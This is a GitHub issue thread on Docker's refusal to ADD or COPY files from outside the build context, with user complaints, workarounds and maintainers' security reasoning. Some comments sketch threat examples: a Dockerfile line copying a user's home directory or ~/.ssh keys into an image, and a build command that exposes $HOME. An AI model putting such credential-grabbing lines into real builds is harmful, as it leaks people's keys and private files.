Moby: Add with relative path to parent directory fails with "Forbidden path"

38

If you have an add line in the Dockerfile which points to another directory, the build of the image fails with the message "Forbidden path".

Example:

FROM tatsuru/debian
ADD ../relative-add/some-file /tmp/some-file

Gives:

$ ../bundles/0.6.6-dev/binary/docker-0.6.6-dev build .
Uploading context 20480 bytes
Step 1 : FROM tatsuru/debian
 ---> 25368de90486
Step 2 : ADD ../relative-add/some-file /tmp/some-file
Error build: Forbidden path: /tmp/relative-add/some-file

I would expect the file to be written to /tmp/some-file, not /tmp/relative-add/some-file.

Sjord picture Sjord  ·  18 Nov 2013

Most helpful comment

137

I find this behavior fairly frustrating, especially for "meta" Dockerfiles. E.g. I have a /dev folder I do most work in, and I want /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It's very annoying not allowing that Dockerfile to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

wwoods picture wwoods  ·  17 Feb 2014

All comments

24

The build actually happens in /tmp/docker-12345, so a relative path like ../relative-add/some-file is relative to /tmp/docker-12345. It would thus search for /tmp/relative-add/some-file, which is also shown in the error message. It is not allowed to include files from outside the build directory, so this results in the "Forbidden path" message.

It was not clear to me that the directory is moved to another directory in /tmp before the build, or that the paths are resolved after moving the directory. It would be great if this can be fixed, or if the error message could be clearer. For example: "relative paths outside the sandbox are not currently supported" when supplying a relative path, or "The file %s is outside the sandbox in %s and can not be added" instead of "Forbidden path".

Sjord picture Sjord  ·  18 Nov 2013
0

2692 is a good first pass at making this more clear.

tianon picture tianon  ·  18 Nov 2013
79

Sorry to hijack, but this seems completely broken to me. I've got a grand total of about 2 hours of Docker experience, so this is likely a problem with my understanding than docker.

I'm going to be creating approximately 10 images from our source tree. But to be able to use the ADD command, I would have to put the Dockerfile in the root of the tree, so only 1 image could be built. Not to mention the fact that this would result in a context of close to 100 megabytes.

I could do an ADD with URL's, but this would make it much more difficult for dev's to create images for testing purposes.

Another option would be to add source to the image via volumes instead of adding it, but this really seems contrary to the spirit of Docker.

It seems to me that one partial, easy solution would be to modify the build command so that the context and the Dockerfile could be specified separately.

bryanlarsen picture bryanlarsen  ·  27 Nov 2013
0

Is there any reason for that change? Why can't we add files from the parent folder?

karellm picture karellm  ·  19 Dec 2013
137

I find this behavior fairly frustrating, especially for "meta" Dockerfiles. E.g. I have a /dev folder I do most work in, and I want /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It's very annoying not allowing that Dockerfile to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

wwoods picture wwoods  ·  17 Feb 2014
4

Another note - the only possible workaround I've found is to symlink the Dockerfile to the root /dev folder. This results in a very long and resource intensive "Uploading context" stage, which appears to (quite needlessly) copy all of the project directories to a temporary location. If the point of containers is isolation, and Dockerfiles (rightfully) don't seem to allow interacting with the build system, why does Docker need to copy all of the files? Why does it copy files that are not referenced in the Dockerfile at all?

wwoods picture wwoods  ·  17 Feb 2014
3

@wwoods the short answer is that the docker client does not parse the Dockerfile. It tgz's the context (current dir and all subdirs) up, passed it all to the server, which then uses the Dockerfile in the tgz to do the work.

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
66

That seems pretty flawed, in that it greatly restricts the viable scope of Dockerfiles. Specifically, it disallows Dockerfiles layered on top of existing code configurations, forcing users to structure their code around the Dockerfile rather than the other way around. I understand the reasoning behind allowing the daemon to be on a remote server, but it seems like it would greatly improve Docker's flexibility to parse the Dockerfile and upload only specified sections. This would enable relative paths and reduce bandwidth in general, while making usage more intuitive (the current behavior is not very intuitive, particularly when playing on a dev box).

wwoods picture wwoods  ·  18 Feb 2014
20

Would it be possible to amend an option flag that could allow users to manually add specific directories to expand the context?

waysidekoi picture waysidekoi  ·  18 Feb 2014
0

That would work, but again way less intuitive than just parsing the Dockerfile. Also, you're wasting a lot of upload bytes for no reason by uploading a lot of files you don't necessarily use.

wwoods picture wwoods  ·  18 Feb 2014
-258

@wwoods - even if the client were to parse the Dockerfile and work out what files to send and which to discard, we still can't afford to bust out of the current directory and let your builder access your client's entire file system.

There are other solutions to your scenario that don't increase our insecurity footprint.

either way, restricting the Dockerfile to the current context is not going to change, so I'm going to close this.

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
117

How is it insecure to allow the builder to access files readable to the user? Why are you superseding linux file security? Please realize that this greatly limits the use cases of Docker and makes it much less enjoyable to add to existing workflows.

wwoods picture wwoods  ·  18 Feb 2014
-5

@wwoods I set up a GitHub repository with code and a Dockerfile in it, you clone it to ~/code/gh-repos/, cd to ~/foobarbaz and run docker build -t foobarbaz .. Let's say I'm a bad guy and I add something like this to the Dockerfile: ADD .. /foo. The image will now contain your entire home directory and anything you might have there. Let's say the resulting image also ends up on the Internet on some registry. Everyone who has the image also has your data - browser history & cookies, private documents, password, public and private SSH keys, some internal company data and some personal data.

We're not going to allow Docker ADD to bust out of its context via .. or anything like it.

unclejack picture unclejack  ·  18 Feb 2014
6

Gotcha... still really need some workaround for this issue. Not being able to have a Dockerfile refer to its parents sure limits usage. Even if there's just a very verbose and scary flag to allow it, not having the option makes Docker useless for certain configurations (again, particularly when you have several images you want to build off of a common set of code). And the upload bandwidth is still a very preventable problem with the current implementation.

wwoods picture wwoods  ·  18 Feb 2014
12

How about my suggestion of adding an option to the build command so that the root directory can be specified as a command line option? That won't break any security, and should cover every use case discussed here.

bryanlarsen picture bryanlarsen  ·  18 Feb 2014
0

Sounds good to me. Most confusing part would be the paths in the Dockerfile now "seem" incorrect because they are relative to a potentially unexpected root. But, since that root path is on the command line, it would be pretty easy to see what was going wrong. And a simple comment in the Dockerfile would suffice; maybe even an EXPECTS root directive or something along those lines to provide a friendly error message if the Dockerfile were ran without a specified root directory.

wwoods picture wwoods  ·  18 Feb 2014
-23

first up, when I want to build several images from common code, I create a common image that brings the code into that image, and then build FROM that. more significantly, I prefer to build from a version controlled source - ie docker build -t stuff http://my.git.org/repo - otherwise I'm building from some random place with random files.

fundamentally, no, when I put on my black-hat, I don't just give you a Dockerfile, I tell you what command to run.

let me re-iterate. there are other ways to solve your issues, and making docker less secure is not the best one.

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
3

Which means you now have two repositories: one that contains the build scripts, and another containing the code. Which have to be properly synchronized. You can use git submodules or git subtrees or ad hoc methods, but all of those options have serious drawbacks. There are many reasons, some good, some bad, that corporations tend to have a single repository containing everything. AFAICT, Facebook is one example of a place that only has a single source repository that contains everything.

bryanlarsen picture bryanlarsen  ·  18 Feb 2014
3

Sometimes you definitely do want to build from a random place with random files - generating a local test image not based off of a commit, for instance. If you have a different testing server or just want to run several different tests at once locally without worrying about database interactions between them, this would be really handy. There's also the issue where Dockerfiles can only RUN commands they have all information for - if your versioned remote source is password / key protected, this means you'd have to give your Docker image the password / key information anyhow to perform a build strictly with Docker.

There might be ways to solve these issues, but that doesn't mean they're pleasant, intuitive, or particularly easy to track down. I don't think docker would be less secure by allowing a change of context on the command line. I understand the reasons for not transparently stepping outside of the build context. On the other hand, not knowing what you're running will always be a security risk unless you're running it in a virtual machine or container anyway. To get around the Dockerfile limitations, packages might have to ship with a Makefile or script that could easily commit the very offenses you're trying to avoid. I don't think that the "docker build" command is the right place for the level of security you're talking about. Making it harder to use / require more external scaffolding makes it more tempting to step outside of Docker for the build process, exacerbating the exact issues you're worried about.

wwoods picture wwoods  ·  18 Feb 2014
0

An alternative approach is to let you use any docker file from a given context. This keeps things secure but also increases flexibility. I'm looking into this now, you can track here #2112

thedeeno picture thedeeno  ·  18 Feb 2014
8

That would work fine; I'll just point out the security implications are the same. From my perspective that's fine though, in that the context change is very transparent on the command line.

As for why they're the same, you have:

docker build -f Dockerfile ..

Equivalent to the aforementioned

docker build -c .. .

I do like the Dockerfile / context specification split in #2112 better though. Good luck with that :) Hopefully it gets merged in.

wwoods picture wwoods  ·  18 Feb 2014
0

I have the following directory structure:

foo/Dockerfile
foo/shared
foo/shared/bar

in the Dockerfile I have:
ADD shared ./imported

if I cd foo and docker build . I get:

build: Forbidden path outside the build context: shared (/mnt/sda1/tmp/docker-build689526572/shared)

as I understood it foo/ is the context of my build so shared should _not_ be outside the context..?

I don't understand what is wrong here. The example I copied from does ADD . ./somedir which I was trying to avoid, and that doesn't work either when I try to do it. Neither does ADD ./shared ./somedir.

anentropic picture anentropic  ·  22 Feb 2014
0

if I try to build the example I was working from (docker-dna/rabbitmq) it throws the same error too, so it's not just my modified version

I am using boot2docker on OSX

anentropic picture anentropic  ·  22 Feb 2014
0

Oh, it's this https://github.com/boot2docker/boot2docker/issues/143

works after upgrading boot2docker to new version

anentropic picture anentropic  ·  22 Feb 2014
0

I found that the Docker Gradle Plugin provides a nice solution to this problem. There is a also a good example project by Spring.

willis7 picture willis7  ·  25 Apr 2015
82

-1 to nannies that want to shorten my rope because I might hang myself with it

ReinsBrain picture ReinsBrain  ·  20 Oct 2015
0

It'd be nice to figure out a better solution or workaround for this... doing something like what @hellais is doing in TheTorProject is pretty gnarly. This is a significant hamper to using Dockerfiles for testing within isolated test/ subdirectories of a project.

jamesob picture jamesob  ·  30 Oct 2015
0

Having just come across this problem I think that keeping the entire build within the context of a directory means that they can be system independent. If you have the Dockerfile and the directory it's in you can build the image without having to fuss about with unknown and undeclared dependencies elsewhere on the system.

yoshiwaan picture yoshiwaan  ·  18 Nov 2015
7

There really should be a command line option to allow this, something like "--allow-relative-imports".
Or even better, have a way to specify additional locations for the build context (not substitutes), e.g.: "--additional-paths=/path/a:/path/b:/path/c".

As for the relative paths option, there's no need for it to follow relative paths by default, so no security issue unless enabled.
However not having it at all is a huge disadvantage that leads to the usage of other build tools wrapped around docker build - which isn't just inconvenient but also totally circumvents this security mechanism making it useless for these usecases, anyways.

ms-xy picture ms-xy  ·  22 Jan 2016
8

I successfully worked around this issue using volumes. Example directory structure:

web/
- Dockerfile -> `ADD . /usr/src/app/`
- (code)

webstatic/
- Dockerfile -> `ADD . /usr/src/app/subdir`
- (code)

compose file excerpt:

web:
  build: ./web/

webstatic:
  build: ./webstatic/
  volumes_from:
    - web

Then in the webstatic code I can access the code from the web container. No need for ADD ../web/ .. in webstatic.

graup picture graup  ·  29 Jan 2016
0

That's a nice modular way to do it.

On 29 January 2016 at 07:59, Paul Grau [email protected] wrote:

I successfully worked around this issue using volumes. Example directory
structure:

web/

  • Dockerfile -> ADD . /usr/src/app/
  • (code)

webstatic/

  • Dockerfile -> ADD . /usr/src/app/subdir
  • (code)

compose file excerpt:

web:
build: ./web/

webstatic:
build: ./webstatic/
volumes_from:
- web

Then in the webstatic code I can access the code from the web container.
No need for ADD ../web/ .. in webstatic.


Reply to this email directly or view it on GitHub
https://github.com/docker/docker/issues/2745#issuecomment-176835978.

yoshiwaan picture yoshiwaan  ·  29 Jan 2016
0

@graup: I like your approach. It's a really nice workaround, thanks for sharing that!

ms-xy picture ms-xy  ·  30 Jan 2016
3

@graup It is a very nice workaround but it covers a serious design problem.
Thanks for sharing this!
I can't believe the docker design forces us to have such workarounds or forcing us a directory structure which is not our choice...
This must be fixed.

Thanks for sharing again.

OferE picture OferE  ·  11 Feb 2016
1

Hi i find a better solution using compose-file.yml version 2 - u can pas the context of the build. So u can place the files wherever u want and just pass them the correct context.

OferE picture OferE  ·  11 Feb 2016
0

You can pass only one context though, which makes multiple independent includes difficult again, the volumes approach is better suited

ms-xy picture ms-xy  ·  15 Feb 2016
4

To wrap this up:
There are several options.

  1. Use .gitignore with negative pattern (or ADD?)
*
!directory-i-want-to-add
!another-directory-i-want-to-add

Plus use docker command specifying dockerfiles and context:

docker build -t my/debug-image -f docker-debug .
docker build -t my/serve-image -f docker-serve .
docker build -t my/build-image -f docker-build .
docker build -t my/test-image -f docker-test .

You could also use different gitignore files.

  1. Mount volumes
    Skip sending context at all, just use mounting volumes during run time (using -v host-dir:/docker-dir).

So you'd have to:

docker build -t my/build-image -f docker-build . # build `build` image (devtools like gulp, grunt, bundle, npm, etc)
docker run -v output:/output my/build-image build-command # copies files to output dir
docker build -t my/serve-image -f docker-serve . # build production from output dir
docker run my/serve-image # production-like serving from included or mounted dir
docker build -t my/serve-image -f docker-debug . # build debug from output dir
docker run my/serve-image # debug-like serving (uses build-image with some watch magic)

Is that something that people usually do? What are devs best practices? I'm sorry, I'm quite new with docker. Quite verbose commands there. Does it mean docker isn't suitable for development?

Vanuan picture Vanuan  ·  4 Mar 2016
-25

@Vanuan please consider that the GitHub issue tracker is not a general support / discussion forum, but for tracking bugs and feature requests.

Your question is better asked on

  • forums.docker.com
  • the #docker IRC channel on freenode
  • StackOverflow

Please consider using one of the above

thaJeztah picture thaJeztah  ·  4 Mar 2016
0
Vanuan picture Vanuan  ·  4 Mar 2016
0

https://github.com/six8/dockerfactory uses a YAML file to allow you to control the context (and other build parameters) of docker build.

six8 picture six8  ·  4 Mar 2016
9

-1 Reduces Docker security? What security? Its about portability.

@graup so now you have two containers that have to run on the same host. Docker volumes and volume management is one of its weakest points.

jdennaho picture jdennaho  ·  8 Mar 2016
55

This is a major pain in the ass for us and apparently a lot of people. In our case we are now having to create a separate repo and script around this because Docker won't copy files from a repo of shared code that is symlinked in. I have to agree that Docker should not be worrying about the security aspect. It should trust devs to know what they're doing. There are a million ways to shoot oneself in the foot in development if you don't, but at least we have the option to do it.

And for the record, copying shared common code into a build is not insecure or shooting oneself in the foot. It should be possible.

jwarkentin picture jwarkentin  ·  20 Jun 2016
0

If you have common code and repeated steps for many builds then you have the option of making a base image with the common code and then using that in your FROM statement.

yoshiwaan picture yoshiwaan  ·  20 Jun 2016
1

That might do the trick. It's a little annoying to have to build two images instead of one and error-prone if someone forgets but it may be a quicker and easier solution to the problem right now.

jwarkentin picture jwarkentin  ·  20 Jun 2016
0
Vanuan picture Vanuan  ·  21 Jun 2016
0

Also see https://github.com/docker/docker/issues/18789 for some more discussion, background, and a workaround

thaJeztah picture thaJeztah  ·  24 Jun 2016
72

This behaviour is very bizarre and I really don't think it's up to users of Docker to care about why it's implemented the way it's implemented. What matters is that it's highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/
├── docker-compose.yml
├── login-queue
│   ├── Dockerfile
server/
├── login-queue
│   ├── pom.xml
├── login-queue-dependency
│   ├── pom.xml
├── pom.xml
├── 500MB folder

My first attempt was doing relative ADDs in the docker/server/Dockerfile. i.e

ADD ../../server/login-queue /opt/login-queue
ADD ../../server/login-queue-dependency /opt/login-queue-dependency

This did not work to my surprise. You can't add files outside of the folder of where you run docker build from. I looked for some alternatives and found the -f option and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

`unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)``

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here's the issue now, my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access ../login-queue-dependency so I have to move server/login-queue-dependencyinto server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.

arianitu picture arianitu  ·  28 Jun 2016
0

@arianitu what if you put login-queue-dependency to login-queue's pom.xml?
In docker-compose you'd build 2 services, one depending on the other. You share it through maven repository.

Vanuan picture Vanuan  ·  29 Jun 2016
-18

Put it in the root and use the .dockerignore file

On Jun 28, 2016, at 12:10, arianitu [email protected] wrote:

This behaviour is very bizarre and I really don't think it's up to users of Docker to care about why it's implemented the way it's implemented. What matters is that it's highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/
├── docker-compose.yml
├── login-queue
│ ├── Dockerfile
server/
├── login-queue
│ ├── pom.xml
├── login-queue-dependency
│ ├── pom.xml
├── pom.xml
├── 500MB folder
My first attempt was doing relative ADDs in the docker/server/Dockerfile. i.e

ADD ../../server/login-queue /opt/login-queue
ADD ../../server/login-queue-dependency /opt/login-queue-dependency
This did not work to my surprise. You can't add files outside of the folder of where you run docker build from. I looked for some alternatives and found the -f option and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)`

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here's the issue now, my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access ../login-queue-dependency so I have to move server/login-queue-dependencyinto server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.


You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or mute the thread.

yoshiwaan picture yoshiwaan  ·  29 Jun 2016
9

You can't get around this with symbolic links, either, unfortunately.

dhasenancyngn picture dhasenancyngn  ·  5 Aug 2016
2

Poking the issue once again.

For those still seeking a usable workaround, there was a method stated somewhere above which we adopted some time ago: using a separate repository and git cloning a specific revision in the Dockerfile.
It works great and if you don't mind having a second repository it is a nice workaround.

The suggestion to put it into the root and using .dockerignore would work if there was a way to specify a file to use as a .dockerignore when running docker build (like it is possible to do so for the Dockerfile, judging by https://docs.docker.com/engine/reference/commandline/build/ it is not possible - docker-compose seems not to have an option either: https://docs.docker.com/compose/compose-file/).

Imagine the following structure:

project-root
|------------ library (included by all sub-projects)
|------------ sub-project1
|------------ sub-project2
|------------ sub-project3

You would need to have one Dockerfile and one .dockerignore file per sub-project, that would be ugly, but acceptable as it could be easily dealt with by using docker-compose. However, as stated above, there seems to be no way to specify the .dockerignore file for a build, which would mean that one would have to rename files before every build (which in turn means no docker-compose).

ms-xy picture ms-xy  ·  22 Aug 2016
18

To be honest this is quite an annoying "feature". Our work around was with scripting, copying the necessary files before running _docker build_ then removing them.

It would be much easier if you could reference parent folders.

h3smith picture h3smith  ·  28 Aug 2016
0

I don't think the behavior should be changed.
But it would be great to have a tool similar to "docker-compose" for building images.
Workflow could be this:

  • mount source directory
  • build/copy necessary stuff
  • commit image

This way copying/installing files would be a part of your application's build script.

Vanuan picture Vanuan  ·  28 Aug 2016
0

@Vanuan I agree that the current behaviour should not be changed.
However, there could (and in my opinion should) be a command line flag allowing for relative imports. As someone stated somewhere above, there's a multitude of ways to shoot oneself in the foot. All of them less easy to spot than a command line flag required to build an image. Could even have it issue a warning that requires some sort of user input.

ms-xy picture ms-xy  ·  30 Aug 2016
6

Not being able to reference parent folder makes docker more complicated than it should be. Undesirable "feature". Why take this choice from user?

=> Our work around was with scripting, copying the necessary files before running docker build then removing them.

Thank you for your solution.

superherointj picture superherointj  ·  12 Sep 2016
47

This is so stupid. I need to add specific resources from a folders, like my built application, and my front end resources. Unfortunately docker won't allow you to do ADD ../ , and it strangely includes random files I don't specify with add when I do it from the parent folder. Why does it do this?

Why do the best practices state that the Dockerfile be in its own empty directory, and then disable relative pathing? That makes no sense.

dessalines picture dessalines  ·  21 Sep 2016
11

Just came up against this problem. Would like a config option to get around this.

davidawad picture davidawad  ·  22 Sep 2016
3

Some info on my use case. I have a docker/ directory with services subdirectories within. So it's like project_root/docker/serviceA/Dockerfile, project_root/docker/serviceB/Dockerfile, etc. I have a project_root/docker/docker-compose.yml file that runs installs on all the services. That's the structure used and it works great, and is limited solely by the "COPY ../src/ /dest/" limitation in a Dockerfile.

I've had to write a script to copy each project_root/service/ directory into the directory with the docker/service/Dockerfile and run the build, which runs the Dockerfile with the COPY command (and without the "evil" ../ pathing). To me, this limitation seems just plain erroneous. I think a good fix would be to either allow turning it off through a config variable, or just by taking out the limitation completely. The point was made above that if this is a security concern, then the user running docker shouldn't have access to the relative path directory in the first place. I agree with that point. We already have a wheel, so let's use it and not reinvent it instead.

Seems like a config variable would make everybody happy, something like "allowRelativePathCopies: true". My vote would be to have it enabled by default, obviously :smile:

artvandelay982 picture artvandelay982  ·  11 Oct 2016
3

+1 for an option that allows turning off the relative pathing restriction.

It's always a good idea to have "secure" defaults, no need to debate that, but by now it should be apparent that there are a bunch of workflows that get forced into ugly workarounds because of this. That would be completely unnecessary with an option to turn it off (while the default behavior would remain the same).

OnixGH picture OnixGH  ·  12 Oct 2016
5

I use tar to work around this.

Say I have directories:

a/Dockerfile
a/libA
b/libB
c/libC

and I am in directory a working on my project, you can do tar cf - . -C ../b libB -C ../c libC | docker build - and you will get a build context which has (at top level) Dockerfile libA libB libC. (-C just changes directory while constructing the tarball)

I was wondering about adding similar syntax to docker build so you can do the same thing, construct the context from a disjoint set of files. This does not have any of the issues that symlink following has from the security point of view, and is relatively simple to implement, just haven't decided on a clear syntax yet, and whether it needs other features.

Note that for complex builds, using tar | docker build - is very flexible, as you can carefully construct build contexts rather than using .dockerignore and it is fast.

justincormack picture justincormack  ·  12 Oct 2016
5

The context for https://github.com/six8/dockerfactory is created by taring up whatever the user defines.

I think the problem of allowing Dockerfile to specify arbitrary directories is someone creating a public Dockerfile could maliciously read things like your SSH keys. Simply add COPY /home/$USER/.ssh .ssh and have the default entrypoint push them somewhere the attacker could retrieve them. So by default, denying anything out of the Dockerfile directory makes sense from a security perspective.

However, for custom build systems, it makes sense to be able to define arbitrary build contexts. Docker does provide a way via taring up files and piping them in, but that's not declarative like Dockerfile. You end up having to check in build scripts that will handle taring and then passing to docker. You can't just simply docker build . anymore. So anything someone comes up with to do this will be non-standard and thus more confusing.

I think you'll always need something outside of Dockerfile to be able to pass in arbitrary contexts for security sake. But that doesn't stop docker from creating something like Dockerfactory.yml to be able to do it so it will at least be a standard.

I prefer a declarative approach in a file like Dockerfile and Dockerfactory.yml, but having it build into the docker build command would make it more obvious. Something like:

# --context <host dir>:<container dir>
docker build --context ../../lib-src:/lib-src --context ../src:/src .

--context would mirror --volume and be a concept most people using Docker are familiar with.

A malicious person could still tell you to do docker build --context $HOME:/home . and steal your files. However, you'd have to manually run this command and wouldn't automatically happen because you check out a Dockerfile and run it blindly.

six8 picture six8  ·  12 Oct 2016
1

Not an ideal solution, but If you only need to load a couple files from a directory on the local filesystem it's possible to workaround by serving a local filesystem over HTTP:

# Set DOCKER_IP=$(docker-machine ip)
# docker-compose.yml
version: '2'
services:
  http_fs:
    image: python:2-onbuild
    command: sh -c 'cd /fs; python -m SimpleHTTPServer 8080'
    ports:
      - '8080:8080'
    volumes:
      - ..:/fs
  foo:
    build:
      context: docker/foo
      args:
        HTTP_FS: "http://${DOCKER_IP}:8080"
# docker/foo/Dockerfile
ARG HTTP_FS
RUN wget "${HTTP_FS}/somefile"

This requires turning on http_fs ( docker-compose up http_fs) before building foo (docker-compose build foo). AFAIK there isn't a way to declare a build dependency via depends_on in docker-compose.yml

mandrews picture mandrews  ·  20 Oct 2016
4

IMO if Docker is not willing to work with parent directory files for some sort of security reasons, it should work with symlinks in the current directory to parent directory files

e.g.

bar/
   actual-file.sh
foo/
   baz/          << current working directory has symlink to a parent directory
      symlink-to-actual-file
      Dockerfile

right now Docker is calling lstat on a symlink that exists, and it's giving me this error:

lstat symlink-to-actual-file: no such file or directory

if the symlinks are there, permissions should be fine

ORESoftware picture ORESoftware  ·  6 Dec 2016
4

Apparently, quite a couple of people seem to think that using tar solves this problem.
Good luck trying to use the tar approach with 30 different docker containers, when each needs its own hand picked context. Especially if they are rebuilt regularly.
You will end up using some sort of build script or ugly workaround. And that's the entire point of this discussion. It should not be necessary to do what we are doing, when the problem could be treated at its source.

ms-xy picture ms-xy  ·  8 Dec 2016
-7

another work-around: forget docker and go higher up the chain using LXD to host your own complete images

ReinsBrain picture ReinsBrain  ·  9 Dec 2016
0

@apcompare I would like to see some numbers to support claim number 2, because I haven't been working on any project using that layout. And yes, we use docker-compose.
I would also like to challenge your claim that any project can easily fit in such a layout. I can instantly think of multiple reasons why that would not work for some projects. (existing build tools / infrastructure, too big of a project, too limiting in its flexibility, ability to deliver hot fixes to older branches (backwards compatibility), programming language(s) restrictions, ....)

ms-xy picture ms-xy  ·  16 Dec 2016
0

Currently I settled on a simple folder structure for my projects :

  • /app/source
  • /app/distribution
  • /app/setup

Where "setup" contains all the docker files together with docker-compose files for production and testing, clean and simple.
The only thing preventing me is this context problem, limited to only subdirectories. And that's frustrating !

Please 💐🐋, add an option to lift up this restriction 🗽 ! Let us change the Docker files context.

Thanks

myuseringithub picture myuseringithub  ·  30 Dec 2016
3

@myuseringithub
Are you new to Docker? Because after using Docker for a year, I figured that the most effective folder structure to use with docker is the following:

/app/Dockerfile
/app/dev/Dockerfile

I.e. you only need 2 dockerfiles:

  • one for production-like environment (including qa, staging, etc), where application is built from sources and included in an image
  • one for development-like environment (including test, ci, etc), where source files are mounted to a running container, and image only contains rarely modified dependencies
Vanuan picture Vanuan  ·  30 Dec 2016
8

Thanks, I'm switching to using Docker in swarm mode, and organizing the code is an important part.
I thought changing the dockerfile context to a parent directory is not possible, turned up that it is. This is what I ended up doing:

Regarding file organization:

/app - _project's root directory_

  • setup - _docker related files, build tools, shellScripts, & tests_
  • source - _raw project code (server & client sides)_
  • distribution - _production ready code_

Regarding "Forbidden path" error:

Running docker-compose up from project root folder, like so:
docker-compose -f ./setup/<docker-compose>.yml up
Inside docker-compose file:

...
    build:
      # Setting context of dockerfile which will be executed.
      context: ../
      dockerfile: ./setup/<dockerfilename>
    # Volume path is relative to docker-compose file, not the dockerfile execution context.
    volumes:
      - ../source/:/app/source/
...

& for running individual dockerfiles:

  • cd to project's root directory
  • docker build -t <imagename> -f setup/nodejsWeb.dockerfile ./
  • docker run -d <imagename>

This way dockerfile/dockercompose can use parent directory in the process of creating images. This is what makes sense for me.

myuseringithub picture myuseringithub  ·  30 Dec 2016
0

Take a look at your docker image size, you'll find it includes everything if you do it from a parent folder. Mine was 1.5GB with all my dev dependencies, which is why I couldn't do it from a parent folder.

dessalines picture dessalines  ·  31 Dec 2016
0

@dessalines thanks, that adds another point to my list why we should have the option to allow parent folders ...

ms-xy picture ms-xy  ·  8 Jan 2017
0

Is there an option to change the running context of an image from dockerhub registry ?
Something like:

...
image: 
     context: ../
     name: node:latest
... 

And then call it from parent folder (docker-compose -f ./subfolder/docker-compose.yml up). Just like its possible with build command.
Thanks

myuseringithub picture myuseringithub  ·  13 Jan 2017
4

I'll be the thousandth person to mention that this is an issue, but here's my situation.

I'm working in a haskell codebase that defines a dependency file (stack.yaml) at the root of the project. We have subprojects that are only tangentially related, but everything is built using the global stack.yaml at the project root. I need it in order to build a subproject, but we should have dockerfiles per subproject, not for the whole megarepo.

.
├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)

Builds should be local to project-a, for example, but I need the stack.yaml from the parent directory in order to build. This is a huge problem and I, like many others, think there should be a configuration variable or docker flag that allows users work around this issue.

5outh picture 5outh  ·  1 Feb 2017
0

@5outh the philosophy of Docker is that you should build a shared part from stack.yaml and use FROM in each Dockerfile:

.
├── common
│   ├── Dockerfile
│   ├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)
docker build -t http://private-registry/project-common:releaseN common/Dockerfile
docker push http://private-registry/project-common:releaseN

In Dockerfile:

FROM http://private-registry/project-common:releaseN
...

I.e. you should treat each project as a fully independent piece. Otherwise we'd all end up in the same interdependent pre-docker shit.

Vanuan picture Vanuan  ·  2 Feb 2017
0

There are a number of reasons that doesn't work. The simplest being you can't use FROM if the base images differ. Alpine, Debian builds but shared application config, you have to follow any of the wonky solutions outlined through out this thread.

neclimdul picture neclimdul  ·  2 Feb 2017
0
.
├── common
│   ├── Dockerfile-alpine
│   ├── Dockerfile-debian
│   ├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)
Vanuan picture Vanuan  ·  2 Feb 2017
20

Even after all these years, this silly restriction hasn't been fixed? I swear Docker is growing less appealing by the hour.

festus1973 picture festus1973  ·  9 Feb 2017
-13

@festus1973 read https://github.com/docker/docker/issues/2745#issuecomment-35335357 on the "why". Keep in mind that docker build runs at the daemon, which could be on a remote server. The daemon gets passed the "context", which is an archive (.tar) of the files to use for building, so simply does not have access to anything outside that, because it's not in the archive. In addition, a Dockerfile having _full access_ to your client machine is a major security concern (as has been mentioned in this thread).

Allowing "random" files from the client that triggers the build to be sent to the daemon (for building) requires a complete rewrite of the way the builder works. Alternative approaches (such as an rsync-like approach, where the daemon requests files from the client when needed) are being looked into, but _do_ require a lot of engineering, design, and security audits.

Meanwhile, alternative approaches (admittedly, less convenient) are mentioned in this discussion https://github.com/docker/docker/issues/2745#issuecomment-253230025

thaJeztah picture thaJeztah  ·  9 Feb 2017
-13

@thaJeztah Thanks for being patient to such ignorant comments and keep up the good work!

Vanuan picture Vanuan  ·  9 Feb 2017
4

@Vanuan You're the one working countless hours on open source projects for zero pay and you're calling me ignorant? Really? But yeah, definitely, keep up the "good work." Great business model by the way. Please do keep cranking out that code for us, mate! I'm sure you'll be able to trade in those upvotes you've earned for cash one day, or perhaps a figurine of your favorite sci-fi character.

@thaJeztah Thanks for the useful reply. All I can say in response is to point out the same things that other people in this thread and other forums have already noted:

  • A docker file can't have "full access" access to anything. It's just a text file.

  • Most people are running this thing as admin on their own machine. They don't expect to get an 'access denied' error when trying to access their own files.

